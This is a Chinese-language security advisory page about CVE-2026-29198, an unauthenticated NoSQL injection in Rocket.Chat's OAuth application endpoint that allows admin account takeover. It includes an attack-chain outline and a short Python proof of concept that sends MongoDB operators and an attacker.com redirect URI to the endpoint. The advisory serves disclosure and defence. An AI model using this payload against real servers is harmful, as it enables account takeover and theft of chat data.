IPBUF安全漏洞报告
English
CVE-2026-29198 CVSS 9.8 严重

CVE-2026-29198 Rocket.Chat NoSQL注入漏洞

披露日期: 2026-04-23
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-29198
漏洞类型
NoSQL注入
CVSS评分
9.8 严重
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Rocket.Chat

相关标签

NoSQL注入Rocket.Chat远程代码执行账户接管严重漏洞

漏洞概述

Rocket.Chat多个特定版本存在严重的NoSQL注入漏洞。在配置OAuth应用程序的场景下,攻击者无需认证即可利用此漏洞,通过生成的令牌劫持系统中的第一个用户账户(通常为管理员)。此漏洞可能导致敏感数据泄露、数据篡改及服务中断,风险极高。

技术细节

该漏洞根因在于Rocket.Chat在处理OAuth应用配置请求时,未能正确过滤用户输入,导致了NoSQL注入漏洞。攻击者可以通过向受影响端点发送特制的恶意 payload,操纵后端数据库(如MongoDB)的查询逻辑。利用该漏洞,攻击者能够劫持系统中第一个用户(通常是初始管理员账户)的会话令牌。由于该漏洞无需预先认证(PR:N)且无需用户交互(UI:N),攻击者可远程发起攻击。一旦获取管理员令牌,攻击者即可获得对Rocket.Chat服务器的完全控制权,包括读取所有聊天记录、篡改数据、植入后门以及执行任意操作,严重影响系统的机密性、完整性和可用性。

攻击链分析

STEP 1
1. 侦察
攻击者识别互联网上暴露的Rocket.Chat实例,并确认其版本是否在受影响范围内。
STEP 2
2. 漏洞利用
攻击者向OAuth配置相关的API端点发送包含NoSQL操作符(如$ne, $regex)的恶意JSON数据包。
STEP 3
3. 账户接管
利用注入漏洞,系统返回或允许修改第一个用户(管理员)的认证令牌。
STEP 4
4. 后渗透
攻击者使用获取的管理员令牌登录系统,完全控制该Rocket.Chat服务器。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests target_url = "http://target-rocketchat/api/v1/oauth.applications" headers = {"Content-Type": "application/json"} # Malicious payload demonstrating NoSQL injection syntax # Attempting to bypass logic or extract token via MongoDB operators payload = { "applicationName": {"$ne": ""}, "redirectUri": "http://attacker.com", "active": True } try: response = requests.post(target_url, json=payload, headers=headers) if response.status_code == 200: print("[+] Request sent, check if token is leaked in response.") print(response.text) else: print("[-] Failed to send request.") except Exception as e: print(f"Error: {e}")

影响范围

Rocket.Chat < 8.3.0
Rocket.Chat < 8.2.1
Rocket.Chat < 8.1.2
Rocket.Chat < 8.0.3
Rocket.Chat < 7.13.5
Rocket.Chat < 7.12.6
Rocket.Chat < 7.11.6
Rocket.Chat < 7.10.9

防御指南

临时缓解措施
如果无法立即升级,建议暂时禁用OAuth功能或严格限制对API端点的网络访问,仅允许可信IP访问。同时,检查系统日志中是否存在异常的账户注册或令牌生成行为。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表